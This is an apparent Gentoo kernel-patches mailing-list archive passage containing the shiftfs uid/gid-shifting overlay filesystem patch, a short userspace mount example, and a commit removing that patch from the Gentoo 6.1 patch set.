++	return false;
++}
++
++static long shiftfs_ioctl(struct file *file, unsigned int cmd,
++			  unsigned long arg)
++{
++	switch (cmd) {
++	case FS_IOC_GETVERSION:
++		/* fall through */
++	case FS_IOC_GETFLAGS:
++		/* fall through */
++	case FS_IOC_SETFLAGS:
++		break;
++	default:
++		if (!in_ioctl_whitelist(cmd, arg) ||
++		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
++			return -ENOTTY;
++	}
++
++	return shiftfs_real_ioctl(file, cmd, arg);
++}
++
++static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
++				 unsigned long arg)
++{
++	switch (cmd) {
++	case FS_IOC32_GETVERSION:
++		/* fall through */
++	case FS_IOC32_GETFLAGS:
++		/* fall through */
++	case FS_IOC32_SETFLAGS:
++		break;
++	default:
++		if (!in_ioctl_whitelist(cmd, arg) ||
++		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
++			return -ENOIOCTLCMD;
++	}
++
++	return shiftfs_real_ioctl(file, cmd, arg);
++}
++
++enum shiftfs_copyop {
++	SHIFTFS_COPY,
++	SHIFTFS_CLONE,
++	SHIFTFS_DEDUPE,
++};
++
++static ssize_t shiftfs_copyfile(struct file *file_in, loff_t pos_in,
++				struct file *file_out, loff_t pos_out, u64 len,
++				unsigned int flags, enum shiftfs_copyop op)
++{
++	ssize_t ret;
++	struct fd real_in, real_out;
++	const struct cred *oldcred;
++	struct inode *inode_out = file_inode(file_out);
++	struct inode *loweri = inode_out->i_private;
++
++	ret = shiftfs_real_fdget(file_out, &real_out);
++	if (ret)
++		return ret;
++
++	ret = shiftfs_real_fdget(file_in, &real_in);
++	if (ret) {
++		fdput(real_out);
++		return ret;
++	}
++
++	oldcred = shiftfs_override_creds(inode_out->i_sb);
++	switch (op) {
++	case SHIFTFS_COPY:
++		ret = vfs_copy_file_range(real_in.file, pos_in, real_out.file,
++					  pos_out, len, flags);
++		break;
++
++	case SHIFTFS_CLONE:
++		ret = vfs_clone_file_range(real_in.file, pos_in, real_out.file,
++					   pos_out, len, flags);
++		break;
++
++	case SHIFTFS_DEDUPE:
++		ret = vfs_dedupe_file_range_one(real_in.file, pos_in,
++						real_out.file, pos_out, len,
++						flags);
++		break;
++	}
++	revert_creds(oldcred);
++
++	/* Update size */
++	shiftfs_copyattr(loweri, inode_out);
++
++	fdput(real_in);
++	fdput(real_out);
++
++	return ret;
++}
++
++static ssize_t shiftfs_copy_file_range(struct file *file_in, loff_t pos_in,
++				       struct file *file_out, loff_t pos_out,
++				       size_t len, unsigned int flags)
++{
++	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len, flags,
++				SHIFTFS_COPY);
++}
++
++static loff_t shiftfs_remap_file_range(struct file *file_in, loff_t pos_in,
++				       struct file *file_out, loff_t pos_out,
++				       loff_t len, unsigned int remap_flags)
++{
++	enum shiftfs_copyop op;
++
++	if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY))
++		return -EINVAL;
++
++	if (remap_flags & REMAP_FILE_DEDUP)
++		op = SHIFTFS_DEDUPE;
++	else
++		op = SHIFTFS_CLONE;
++
++	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len,
++				remap_flags, op);
++}
++
++static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
++{
++	const struct cred *oldcred;
++	int err = -ENOTDIR;
++	struct file *realfile = file->private_data;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	err = iterate_dir(realfile, ctx);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++const struct file_operations shiftfs_file_operations = {
++	.open			= shiftfs_open,
++	.release		= shiftfs_release,
++	.llseek			= shiftfs_file_llseek,
++	.read_iter		= shiftfs_read_iter,
++	.write_iter		= shiftfs_write_iter,
++	.fsync			= shiftfs_fsync,
++	.mmap			= shiftfs_mmap,
++	.fallocate		= shiftfs_fallocate,
++	.fadvise		= shiftfs_fadvise,
++	.unlocked_ioctl		= shiftfs_ioctl,
++	.compat_ioctl		= shiftfs_compat_ioctl,
++	.copy_file_range	= shiftfs_copy_file_range,
++	.remap_file_range	= shiftfs_remap_file_range,
++	.splice_read		= generic_file_splice_read,
++	.splice_write		= iter_file_splice_write,
++};
++
++const struct file_operations shiftfs_dir_operations = {
++	.open			= shiftfs_dir_open,
++	.release		= shiftfs_dir_release,
++	.compat_ioctl		= shiftfs_compat_ioctl,
++	.fsync			= shiftfs_fsync,
++	.iterate_shared		= shiftfs_iterate_shared,
++	.llseek			= shiftfs_dir_llseek,
++	.read			= generic_read_dir,
++	.unlocked_ioctl		= shiftfs_ioctl,
++};
++
++static const struct address_space_operations shiftfs_aops = {
++	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO */
++	.direct_IO	= noop_direct_IO,
++};
++
++static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
++			       umode_t mode, dev_t dev, struct dentry *dentry)
++{
++	struct inode *loweri;
++
++	inode->i_ino = ino;
++	inode->i_flags |= S_NOCMTIME;
++
++	mode &= S_IFMT;
++	inode->i_mode = mode;
++	switch (mode & S_IFMT) {
++	case S_IFDIR:
++		inode->i_op = &shiftfs_dir_inode_operations;
++		inode->i_fop = &shiftfs_dir_operations;
++		break;
++	case S_IFLNK:
++		inode->i_op = &shiftfs_symlink_inode_operations;
++		break;
++	case S_IFREG:
++		inode->i_op = &shiftfs_file_inode_operations;
++		inode->i_fop = &shiftfs_file_operations;
++		inode->i_mapping->a_ops = &shiftfs_aops;
++		break;
++	default:
++		inode->i_op = &shiftfs_special_inode_operations;
++		init_special_inode(inode, mode, dev);
++		break;
++	}
++
++	if (!dentry)
++		return;
++
++	loweri = dentry->d_inode;
++	if (!loweri->i_op->get_link)
++		inode->i_opflags |= IOP_NOFOLLOW;
++
++	shiftfs_copyattr(loweri, inode);
++	shiftfs_copyflags(loweri, inode);
++	set_nlink(inode, loweri->i_nlink);
++}
++
++static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++
++	if (sbinfo->mark)
++		seq_show_option(m, "mark", NULL);
++
++	if (sbinfo->passthrough)
++		seq_printf(m, ",passthrough=%u", sbinfo->passthrough);
++
++	return 0;
++}
++
++static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++	struct dentry *root = sb->s_root;
++	struct dentry *realroot = root->d_fsdata;
++	struct path realpath = { .mnt = sbinfo->mnt, .dentry = realroot };
++	int err;
++
++	err = vfs_statfs(&realpath, buf);
++	if (err)
++		return err;
++
++	if (!shiftfs_passthrough_statfs(sbinfo))
++		buf->f_type = sb->s_magic;
++
++	return 0;
++}
++
++static void shiftfs_evict_inode(struct inode *inode)
++{
++	struct inode *loweri = inode->i_private;
++
++	clear_inode(inode);
++
++	if (loweri)
++		iput(loweri);
++}
++
++static void shiftfs_put_super(struct super_block *sb)
++{
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++
++	if (sbinfo) {
++		mntput(sbinfo->mnt);
++		put_cred(sbinfo->creator_cred);
++		kfree(sbinfo);
++	}
++}
++
++static const struct xattr_handler shiftfs_xattr_handler = {
++	.prefix = "",
++	.get    = shiftfs_xattr_get,
++	.set    = shiftfs_xattr_set,
++};
++
++const struct xattr_handler *shiftfs_xattr_handlers[] = {
++#ifdef CONFIG_SHIFT_FS_POSIX_ACL
++	&shiftfs_posix_acl_access_xattr_handler,
++	&shiftfs_posix_acl_default_xattr_handler,
++#endif
++	&shiftfs_xattr_handler,
++	NULL
++};
++
++static inline bool passthrough_is_subset(int old_flags, int new_flags)
++{
++	if ((new_flags & old_flags) != new_flags)
++		return false;
++
++	return true;
++}
++
++static int shiftfs_super_check_flags(unsigned long old_flags,
++				     unsigned long new_flags)
++{
++	if ((old_flags & SB_RDONLY) && !(new_flags & SB_RDONLY))
++		return -EPERM;
++
++	if ((old_flags & SB_NOSUID) && !(new_flags & SB_NOSUID))
++		return -EPERM;
++
++	if ((old_flags & SB_NODEV) && !(new_flags & SB_NODEV))
++		return -EPERM;
++
++	if ((old_flags & SB_NOEXEC) && !(new_flags & SB_NOEXEC))
++		return -EPERM;
++
++	if ((old_flags & SB_NOATIME) && !(new_flags & SB_NOATIME))
++		return -EPERM;
++
++	if ((old_flags & SB_NODIRATIME) && !(new_flags & SB_NODIRATIME))
++		return -EPERM;
++
++	if (!(old_flags & SB_POSIXACL) && (new_flags & SB_POSIXACL))
++		return -EPERM;
++
++	return 0;
++}
++
++static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
++{
++	int err;
++	struct shiftfs_super_info new = {};
++	struct shiftfs_super_info *info = sb->s_fs_info;
++
++	err = shiftfs_parse_mount_options(&new, data);
++	if (err)
++		return err;
++
++	err = shiftfs_super_check_flags(sb->s_flags, *flags);
++	if (err)
++		return err;
++
++	/* Mark mount option cannot be changed. */
++	if (info->mark || (info->mark != new.mark))
++		return -EPERM;
++
++	if (info->passthrough != new.passthrough) {
++		/* Don't allow exceeding passthrough options of mark mount. */
++		if (!passthrough_is_subset(info->passthrough_mark,
++					   info->passthrough))
++			return -EPERM;
++
++		info->passthrough = new.passthrough;
++	}
++
++	return 0;
++}
++
++static const struct super_operations shiftfs_super_ops = {
++	.put_super	= shiftfs_put_super,
++	.show_options	= shiftfs_show_options,
++	.statfs		= shiftfs_statfs,
++	.remount_fs	= shiftfs_remount,
++	.evict_inode	= shiftfs_evict_inode,
++};
++
++struct shiftfs_data {
++	void *data;
++	const char *path;
++};
++
++static void shiftfs_super_force_flags(struct super_block *sb,
++				      unsigned long lower_flags)
++{
++	sb->s_flags |= lower_flags & (SB_RDONLY | SB_NOSUID | SB_NODEV |
++				      SB_NOEXEC | SB_NOATIME | SB_NODIRATIME);
++
++	if (!(lower_flags & SB_POSIXACL))
++		sb->s_flags &= ~SB_POSIXACL;
++}
++
++static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
++			      int silent)
++{
++	int err;
++	struct path path = {};
++	struct shiftfs_super_info *sbinfo_mp;
++	char *name = NULL;
++	struct inode *inode = NULL;
++	struct dentry *dentry = NULL;
++	struct shiftfs_data *data = raw_data;
++	struct shiftfs_super_info *sbinfo = NULL;
++
++	if (!data->path)
++		return -EINVAL;
++
++	sb->s_fs_info = kzalloc(sizeof(*sbinfo), GFP_KERNEL);
++	if (!sb->s_fs_info)
++		return -ENOMEM;
++	sbinfo = sb->s_fs_info;
++
++	err = shiftfs_parse_mount_options(sbinfo, data->data);
++	if (err)
++		return err;
++
++	/* to mount a mark, must be userns admin */
++	if (!sbinfo->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
++		return -EPERM;
++
++	name = kstrdup(data->path, GFP_KERNEL);
++	if (!name)
++		return -ENOMEM;
++
++	err = kern_path(name, LOOKUP_FOLLOW, &path);
++	if (err)
++		goto out_free_name;
++
++	if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
++		err = -ENOTDIR;
++		goto out_put_path;
++	}
++
++	/*
++	 * It makes no sense to handle idmapped layers from shiftfs.
++	 * And we didn't support it properly anyway.
++	 */
++	if (is_idmapped_mnt(path.mnt)) {
++		err = -EINVAL;
++		pr_err("idmapped layers are currently not supported\n");
++		goto out_put_path;
++	}
++
++	sb->s_flags |= SB_POSIXACL;
++
++	if (sbinfo->mark) {
++		struct cred *cred_tmp;
++		struct super_block *lower_sb = path.mnt->mnt_sb;
++
++		/* to mark a mount point, must root wrt lower s_user_ns */
++		if (!ns_capable(lower_sb->s_user_ns, CAP_SYS_ADMIN)) {
++			err = -EPERM;
++			goto out_put_path;
++		}
++
++		/*
++		 * this part is visible unshifted, so make sure no
++		 * executables can be used to gain suid
++		 * privileges
++		 */
++		sb->s_iflags = SB_I_NOEXEC;
++
++		shiftfs_super_force_flags(sb, lower_sb->s_flags);
++
++		/*
++		 * Handle nesting of shiftfs mounts by referring this mark
++		 * mount back to the original mark mount. This is more
++		 * efficient and alleviates concerns about stack depth.
++		 */
++		if (lower_sb->s_magic == SHIFTFS_MAGIC) {
++			sbinfo_mp = lower_sb->s_fs_info;
++
++			/* Doesn't make sense to mark a mark mount */
++			if (sbinfo_mp->mark) {
++				err = -EINVAL;
++				goto out_put_path;
++			}
++
++			if (!passthrough_is_subset(sbinfo_mp->passthrough,
++						   sbinfo->passthrough)) {
++				err = -EPERM;
++				goto out_put_path;
++			}
++
++			sbinfo->mnt = mntget(sbinfo_mp->mnt);
++			dentry = dget(path.dentry->d_fsdata);
++			/*
++			 * Copy up the passthrough mount options from the
++			 * parent mark mountpoint.
++			 */
++			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
++			sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
++		} else {
++			sbinfo->mnt = mntget(path.mnt);
++			dentry = dget(path.dentry);
++			/*
++			 * For a new mark, passthrough_mark and passthrough
++			 * are identical.
++			 */
++			sbinfo->passthrough_mark = sbinfo->passthrough;
++
++			cred_tmp = prepare_creds();
++			if (!cred_tmp) {
++				err = -ENOMEM;
++				goto out_put_path;
++			}
++			/* Don't override disk quota limits or use reserved space. */
++			cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
++			sbinfo->creator_cred = cred_tmp;
++		}
++	} else {
++		/*
++		 * This leg executes if we're admin capable in the namespace,
++		 * so be very careful.
++		 */
++		err = -EPERM;
++		if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
++			goto out_put_path;
++
++		sbinfo_mp = path.dentry->d_sb->s_fs_info;
++		if (!sbinfo_mp->mark)
++			goto out_put_path;
++
++		if (!passthrough_is_subset(sbinfo_mp->passthrough,
++					   sbinfo->passthrough))
++			goto out_put_path;
++
++		sbinfo->mnt = mntget(sbinfo_mp->mnt);
++		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
++		dentry = dget(path.dentry->d_fsdata);
++		/*
++		 * Copy up passthrough settings from mark mountpoint so we can
++		 * verify when the overlay wants to remount with different
++		 * passthrough settings.
++		 */
++		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
++		shiftfs_super_force_flags(sb, path.mnt->mnt_sb->s_flags);
++	}
++
++	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
++	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
++		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
++		err = -EINVAL;
++		goto out_put_path;
++	}
++
++	inode = new_inode(sb);
++	if (!inode) {
++		err = -ENOMEM;
++		goto out_put_path;
++	}
++	shiftfs_fill_inode(inode, dentry->d_inode->i_ino, S_IFDIR, 0, dentry);
++
++	ihold(dentry->d_inode);
++	inode->i_private = dentry->d_inode;
++
++	sb->s_magic = SHIFTFS_MAGIC;
++	sb->s_maxbytes = MAX_LFS_FILESIZE;
++	sb->s_op = &shiftfs_super_ops;
++	sb->s_xattr = shiftfs_xattr_handlers;
++	sb->s_d_op = &shiftfs_dentry_ops;
++	sb->s_root = d_make_root(inode);
++	if (!sb->s_root) {
++		err = -ENOMEM;
++		goto out_put_path;
++	}
++
++	sb->s_root->d_fsdata = dentry;
++	sbinfo->userns = get_user_ns(dentry->d_sb->s_user_ns);
++	shiftfs_copyattr(dentry->d_inode, sb->s_root->d_inode);
++
++	dentry = NULL;
++	err = 0;
++
++out_put_path:
++	path_put(&path);
++
++out_free_name:
++	kfree(name);
++
++	dput(dentry);
++
++	return err;
++}
++
++static struct dentry *shiftfs_mount(struct file_system_type *fs_type,
++				    int flags, const char *dev_name, void *data)
++{
++	struct shiftfs_data d = { data, dev_name };
++
++	return mount_nodev(fs_type, flags, &d, shiftfs_fill_super);
++}
++
++static struct file_system_type shiftfs_type = {
++	.owner		= THIS_MODULE,
++	.name		= "shiftfs",
++	.mount		= shiftfs_mount,
++	.kill_sb	= kill_anon_super,
++	.fs_flags	= FS_USERNS_MOUNT,
++};
++
++static int __init shiftfs_init(void)
++{
++	return register_filesystem(&shiftfs_type);
++}
++
++static void __exit shiftfs_exit(void)
++{
++	unregister_filesystem(&shiftfs_type);
++}
++
++MODULE_ALIAS_FS("shiftfs");
++MODULE_AUTHOR("James Bottomley");
++MODULE_AUTHOR("Seth Forshee <seth.forshee@canonical.com>");
++MODULE_AUTHOR("Christian Brauner <christian.brauner@ubuntu.com>");
++MODULE_DESCRIPTION("id shifting filesystem");
++MODULE_LICENSE("GPL v2");
++module_init(shiftfs_init)
++module_exit(shiftfs_exit)
+--- a/include/uapi/linux/magic.h	2023-03-06 11:56:37.299048477 -0500
++++ b/include/uapi/linux/magic.h	2023-03-06 11:57:37.466014822 -0500
+@@ -102,4 +102,6 @@
+ #define DEVMEM_MAGIC		0x454d444d	/* "DMEM" */
+ #define SECRETMEM_MAGIC		0x5345434d	/* "SECM" */
+ 
++#define SHIFTFS_MAGIC		0x6a656a62
++
+ #endif /* __LINUX_MAGIC_H__ */
+--- a/fs/Makefile	2023-03-06 11:54:08.154952284 -0500
++++ b/fs/Makefile	2023-03-06 11:55:21.982000456 -0500
+@@ -137,3 +137,4 @@ obj-$(CONFIG_EFIVAR_FS)		+= efivarfs/
+ obj-$(CONFIG_EROFS_FS)		+= erofs/
+ obj-$(CONFIG_VBOXSF_FS)		+= vboxsf/
+ obj-$(CONFIG_ZONEFS_FS)		+= zonefs/
++obj-$(CONFIG_SHIFT_FS)		+= shiftfs.o
+--- a/fs/Kconfig	2023-03-06 11:52:29.331094254 -0500
++++ b/fs/Kconfig	2023-03-06 11:52:43.127835240 -0500
+@@ -128,6 +128,24 @@ source "fs/autofs/Kconfig"
+ source "fs/fuse/Kconfig"
+ source "fs/overlayfs/Kconfig"
+ 
++config SHIFT_FS
++	tristate "UID/GID shifting overlay filesystem for containers"
++	help
++	  This filesystem can overlay any mounted filesystem and shift
++	  the uid/gid the files appear at.  The idea is that
++	  unprivileged containers can use this to mount root volumes
++	  using this technique.
++
++config SHIFT_FS_POSIX_ACL
++	bool "shiftfs POSIX Access Control Lists"
++	depends on SHIFT_FS
++	select FS_POSIX_ACL
++	help
++	  POSIX Access Control Lists (ACLs) support permissions for users and
++	  groups beyond the owner/group/world scheme.
++
++	  If you don't know what Access Control Lists are, say N.
++
+ menu "Caches"
+ 
+ source "fs/netfs/Kconfig"
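
For orientation, a minimal userspace sketch (not part of the patch) of how
the two shiftfs mount steps would typically be driven. The paths
/var/lib/ctr and /mnt/shifted are hypothetical, and in practice the two
mount(2) calls run in different privilege contexts; the option strings
correspond to the "mark" and "passthrough=%u" options parsed by
shiftfs_parse_mount_options():

    #include <stdio.h>
    #include <sys/mount.h>

    int main(void)
    {
            /* Step 1, as CAP_SYS_ADMIN in the lower filesystem's user
             * namespace: mark the subtree as shiftable and allow stat
             * and whitelisted-ioctl passthrough (bits 1 | 2). */
            if (mount("/var/lib/ctr", "/var/lib/ctr", "shiftfs", 0,
                      "mark,passthrough=3") < 0) {
                    perror("mark mount");
                    return 1;
            }

            /* Step 2, as CAP_SYS_ADMIN in the container's user namespace:
             * mount on top of the marked mount; ids are then shifted
             * through the superblock's user namespace. */
            if (mount("/var/lib/ctr", "/mnt/shifted", "shiftfs", 0,
                      "passthrough=3") < 0) {
                    perror("shifted mount");
                    return 1;
            }

            return 0;
    }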


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-03 13:01 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-03 13:01 UTC (permalink / raw
  To: gentoo-commits

commit:     0a06433fb4a1c7576591d46661bc9e1308d17e59
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar  3 13:00:38 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar  3 13:00:38 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=0a06433f

Remove shiftfs until I fix the patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                       |    4 -
 5000_shiftfs-6.1-2023-01-31.patch | 6554 -------------------------------------
 2 files changed, 6558 deletions(-)

diff --git a/0000_README b/0000_README
index 328fcd23..dca64867 100644
--- a/0000_README
+++ b/0000_README
@@ -147,10 +147,6 @@ Patch:  4567_distro-Gentoo-Kconfig.patch
 From:   Tom Wijsman <TomWij@gentoo.org>
 Desc:   Add Gentoo Linux support config settings and defaults.
 
-Patch:  5000_shiftfs-6.1-2023-01-31.patch
-From:   https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/unstable
-Desc:   Kernel module that provides a kernel filesystem for uid/gid shifting
-
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.

diff --git a/5000_shiftfs-6.1-2023-01-31.patch b/5000_shiftfs-6.1-2023-01-31.patch
deleted file mode 100644
index a5b40429..00000000
--- a/5000_shiftfs-6.1-2023-01-31.patch
+++ /dev/null
@@ -1,6554 +0,0 @@
-From b554e3101fdc94969141491a4234b3c931683b5c Mon Sep 17 00:00:00 2001
-From: James Bottomley <James.Bottomley@HansenPartnership.com>
-Date: Thu, 4 Apr 2019 15:39:11 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: uid/gid shifting bind mount
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1823186
-
-This allows any subtree to be uid/gid shifted and bound elsewhere.  It
-does this by operating similarly to overlayfs.  Its primary use is for
-shifting the underlying uids of filesystems used to support
-unprivileged (uid shifted) containers.  The usual use case here is
-that the container is operating with a uid shifted unprivileged root
-but sometimes needs to make use of or work with a filesystem image
-that has root at real uid 0.
-
-The mechanism is to allow any subordinate mount namespace to mount a
-shiftfs filesystem (by marking it FS_USERNS_MOUNT) but only allowing
-it to mount marked subtrees (using the -o mark option as root).  Once
-mounted, the subtree is mapped via the super block user namespace so
-that the interior ids of the mounting user namespace are the ids
-written to the filesystem.
-
-Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
-[ saf: use designated initializers for path declarations to fix errors
-  with struct randomization ]
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-[update: port to 5.0]
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/Kconfig                 |   8 +
- fs/Makefile                |   1 +
- fs/shiftfs.c               | 780 +++++++++++++++++++++++++++++++++++++
- include/uapi/linux/magic.h |   2 +
- 4 files changed, 791 insertions(+)
- create mode 100644 fs/shiftfs.c
-
-diff --git a/fs/Kconfig b/fs/Kconfig
-index 2685a4d0d353..b53bece1e940 100644
---- a/fs/Kconfig
-+++ b/fs/Kconfig
-@@ -128,6 +128,14 @@ source "fs/autofs/Kconfig"
- source "fs/fuse/Kconfig"
- source "fs/overlayfs/Kconfig"
- 
-+config SHIFT_FS
-+	tristate "UID/GID shifting overlay filesystem for containers"
-+	help
-+	  This filesystem can overlay any mounted filesystem and shift
-+	  the uid/gid the files appear at.  The idea is that
-+	  unprivileged containers can use this to mount root volumes
-+	  using this technique.
-+
- menu "Caches"
- 
- source "fs/netfs/Kconfig"
-diff --git a/fs/Makefile b/fs/Makefile
-index 4dea17840761..628632dcb9b1 100644
---- a/fs/Makefile
-+++ b/fs/Makefile
-@@ -137,3 +137,4 @@ obj-$(CONFIG_EFIVAR_FS)		+= efivarfs/
- obj-$(CONFIG_EROFS_FS)		+= erofs/
- obj-$(CONFIG_VBOXSF_FS)		+= vboxsf/
- obj-$(CONFIG_ZONEFS_FS)		+= zonefs/
-+obj-$(CONFIG_SHIFT_FS)		+= shiftfs.o
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-new file mode 100644
-index 000000000000..f7cada126daa
---- /dev/null
-+++ b/fs/shiftfs.c
-@@ -0,0 +1,780 @@
-+#include <linux/cred.h>
-+#include <linux/mount.h>
-+#include <linux/file.h>
-+#include <linux/fs.h>
-+#include <linux/namei.h>
-+#include <linux/module.h>
-+#include <linux/kernel.h>
-+#include <linux/magic.h>
-+#include <linux/parser.h>
-+#include <linux/seq_file.h>
-+#include <linux/statfs.h>
-+#include <linux/slab.h>
-+#include <linux/user_namespace.h>
-+#include <linux/uidgid.h>
-+#include <linux/xattr.h>
-+
-+struct shiftfs_super_info {
-+	struct vfsmount *mnt;
-+	struct user_namespace *userns;
-+	bool mark;
-+};
-+
-+static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
-+				       struct dentry *dentry);
-+
-+enum {
-+	OPT_MARK,
-+	OPT_LAST,
-+};
-+
-+/* global filesystem options */
-+static const match_table_t tokens = {
-+	{ OPT_MARK, "mark" },
-+	{ OPT_LAST, NULL }
-+};
-+
-+static const struct cred *shiftfs_get_up_creds(struct super_block *sb)
-+{
-+	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+	struct cred *cred = prepare_creds();
-+
-+	if (!cred)
-+		return NULL;
-+
-+	cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid));
-+	cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid));
-+	put_user_ns(cred->user_ns);
-+	cred->user_ns = get_user_ns(ssi->userns);
-+
-+	return cred;
-+}
-+
-+static const struct cred *shiftfs_new_creds(const struct cred **newcred,
-+					    struct super_block *sb)
-+{
-+	const struct cred *cred = shiftfs_get_up_creds(sb);
-+
-+	*newcred = cred;
-+
-+	if (cred)
-+		cred = override_creds(cred);
-+	else
-+		printk(KERN_ERR "shiftfs: Credential override failed: no memory\n");
-+
-+	return cred;
-+}
-+
-+static void shiftfs_old_creds(const struct cred *oldcred,
-+			      const struct cred **newcred)
-+{
-+	if (!*newcred)
-+		return;
-+
-+	revert_creds(oldcred);
-+	put_cred(*newcred);
-+}
-+
-+static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
-+{
-+	char *p;
-+	substring_t args[MAX_OPT_ARGS];
-+
-+	ssi->mark = false;
-+
-+	while ((p = strsep(&options, ",")) != NULL) {
-+		int token;
-+
-+		if (!*p)
-+			continue;
-+
-+		token = match_token(p, tokens, args);
-+		switch (token) {
-+		case OPT_MARK:
-+			ssi->mark = true;
-+			break;
-+		default:
-+			return -EINVAL;
-+		}
-+	}
-+	return 0;
-+}
-+
-+static void shiftfs_d_release(struct dentry *dentry)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+
-+	dput(real);
-+}
-+
-+static struct dentry *shiftfs_d_real(struct dentry *dentry,
-+				     const struct inode *inode)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+
-+	if (unlikely(real->d_flags & DCACHE_OP_REAL))
-+		return real->d_op->d_real(real, real->d_inode);
-+
-+	return real;
-+}
-+
-+static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+
-+	if (d_unhashed(real))
-+		return 0;
-+
-+	if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE))
-+		return 1;
-+
-+	return real->d_op->d_weak_revalidate(real, flags);
-+}
-+
-+static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int ret;
-+
-+	if (d_unhashed(real))
-+		return 0;
-+
-+	/*
-+	 * inode state of underlying changed from positive to negative
-+	 * or vice versa; force a lookup to update our view
-+	 */
-+	if (d_is_negative(real) != d_is_negative(dentry))
-+		return 0;
-+
-+	if (!(real->d_flags & DCACHE_OP_REVALIDATE))
-+		return 1;
-+
-+	ret = real->d_op->d_revalidate(real, flags);
-+
-+	if (ret == 0 && !(flags & LOOKUP_RCU))
-+		d_invalidate(real);
-+
-+	return ret;
-+}
-+
-+static const struct dentry_operations shiftfs_dentry_ops = {
-+	.d_release	= shiftfs_d_release,
-+	.d_real		= shiftfs_d_real,
-+	.d_revalidate	= shiftfs_d_revalidate,
-+	.d_weak_revalidate = shiftfs_d_weak_revalidate,
-+};
-+
-+static int shiftfs_readlink(struct dentry *dentry, char __user *data,
-+			    int flags)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	const struct inode_operations *iop = real->d_inode->i_op;
-+
-+	if (iop->readlink)
-+		return iop->readlink(real, data, flags);
-+
-+	return -EINVAL;
-+}
-+
-+static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
-+				    struct delayed_call *done)
-+{
-+	if (dentry) {
-+		struct dentry *real = dentry->d_fsdata;
-+		struct inode *reali = real->d_inode;
-+		const struct inode_operations *iop = reali->i_op;
-+		const char *res = ERR_PTR(-EPERM);
-+
-+		if (iop->get_link)
-+			res = iop->get_link(real, reali, done);
-+
-+		return res;
-+	} else {
-+		/* RCU lookup not supported */
-+		return ERR_PTR(-ECHILD);
-+	}
-+}
-+
-+static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
-+			    const char *name, const void *value,
-+			    size_t size, int flags)
-+{
-+	struct dentry *real = dentry->d_fsdata;
-+	int err = -EOPNOTSUPP;
-+	const struct cred *oldcred, *newcred;
-+
-+	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	err = vfs_setxattr(real, name, value, size, flags);
-+	shiftfs_old_creds(oldcred, &newcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_xattr_get(const struct xattr_handler *handler,
-+			     struct dentry *dentry, struct inode *inode,
-+			     const char *name, void *value, size_t size)
-+{
